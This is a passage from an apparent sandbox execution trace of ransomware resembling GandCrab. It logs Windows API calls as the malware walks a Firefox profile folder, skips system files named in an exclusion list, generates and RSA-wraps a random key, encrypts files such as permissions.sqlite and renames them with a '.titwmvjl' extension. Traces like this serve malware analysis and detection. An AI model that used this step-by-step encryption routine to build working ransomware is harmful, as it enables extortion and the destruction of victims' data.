3\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0083.067] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0083.067] CloseHandle (hObject=0x2d4) returned 1 [0083.067] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.068] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.068] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1c, wMilliseconds=0x176)) [0083.068] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.068] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.068] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.068] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock") returned 114 [0083.068] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0083.069] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.069] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.069] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\") returned 90 [0083.069] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*" [0083.069] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5035b8 [0083.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.069] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.070] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.071] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0083.071] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0083.071] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock" [0083.071] lstrlenW (lpString=".titwmvjl") returned 9 [0083.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock") returned 114 [0083.071] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.071] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 123 [0083.071] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a09d2ca4deb61a.lock") returned 114 [0083.071] lstrlenW (lpString=".lock") returned 5 [0083.071] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.071] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0083.071] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.072] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.072] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0083.072] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0083.072] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0083.072] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt" [0083.072] lstrlenW (lpString=".titwmvjl") returned 9 [0083.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt") returned 110 [0083.072] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.072] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 119 [0083.072] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt") returned 110 [0083.072] lstrlenW (lpString=".txt") returned 4 [0083.072] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.073] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0083.073] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0083.073] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt") returned 110 [0083.073] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\TITWMVJL-DECRYPT.txt") returned 110 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0083.073] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0083.073] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.073] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0083.073] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0083.074] CloseHandle (hObject=0x2d4) returned 1 [0083.074] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.074] lstrcmpW (lpString1="parent.lock", lpString2=".") returned 1 [0083.074] lstrcmpW (lpString1="parent.lock", lpString2="..") returned 1 [0083.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock" [0083.074] lstrlenW (lpString=".titwmvjl") returned 9 [0083.074] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock") returned 91 [0083.074] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.074] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock.titwmvjl") returned 100 [0083.074] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock") returned 91 [0083.075] lstrlenW (lpString=".lock") returned 5 [0083.075] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.075] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0083.075] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.075] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.075] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.075] lstrcmpW (lpString1="permissions.sqlite", lpString2=".") returned 1 [0083.075] lstrcmpW (lpString1="permissions.sqlite", lpString2="..") returned 1 [0083.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" [0083.075] lstrlenW (lpString=".titwmvjl") returned 9 [0083.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0083.075] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.075] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite.titwmvjl") returned 107 [0083.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0083.076] lstrlenW (lpString=".sqlite") returned 7 [0083.076] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.076] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0083.076] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0083.076] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0083.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="desktop.ini") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="autorun.inf") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="iconcache.db") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="bootsect.bak") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="boot.ini") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat.log") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="thumbs.db") returned -1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntldr") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="NTDETECT.COM") returned 1 [0083.076] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Bootfont.bin") returned 1 [0083.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0083.076] lstrlenW (lpString=".sqlite") returned 7 [0083.076] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.077] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0083.077] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.077] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.077] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0083.078] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.078] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0083.090] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.090] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.090] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.093] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.093] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.093] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.093] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0083.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.093] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.093] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.094] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.094] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.096] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.097] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.097] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.097] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.097] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.097] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.097] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.097] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.100] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5032f8) returned 1 [0083.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.101] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.101] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.101] GetLastError () returned 0x0 [0083.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.101] CryptDestroyKey (hKey=0x5032f8) returned 1 [0083.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.101] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.102] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.104] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5033b8) returned 1 [0083.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.105] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.105] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.105] GetLastError () returned 0x0 [0083.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.105] CryptDestroyKey (hKey=0x5033b8) returned 1 [0083.105] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.105] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.105] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.105] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.106] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x18000, lpOverlapped=0x0) returned 1 [0083.120] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.121] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x18000, lpOverlapped=0x0) returned 1 [0083.153] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.153] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.155] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.158] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.159] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.159] CloseHandle (hObject=0x2d4) returned 1 [0083.160] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0083.160] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.160] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.160] lstrcmpW (lpString1="places.sqlite", lpString2=".") returned 1 [0083.160] lstrcmpW (lpString1="places.sqlite", lpString2="..") returned 1 [0083.160] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" [0083.160] lstrlenW (lpString=".titwmvjl") returned 9 [0083.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0083.160] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0083.161] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite.titwmvjl") returned 102 [0083.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0083.161] lstrlenW (lpString=".sqlite") returned 7 [0083.161] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0083.161] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0083.161] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0083.161] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0083.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="desktop.ini") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="autorun.inf") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="iconcache.db") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="bootsect.bak") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="boot.ini") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat.log") returned 1 [0083.161] lstrcmpiW (lpString1="places.sqlite", lpString2="thumbs.db") returned -1 [0083.161] lstrcmpiW (lpString1="places.sqlite", 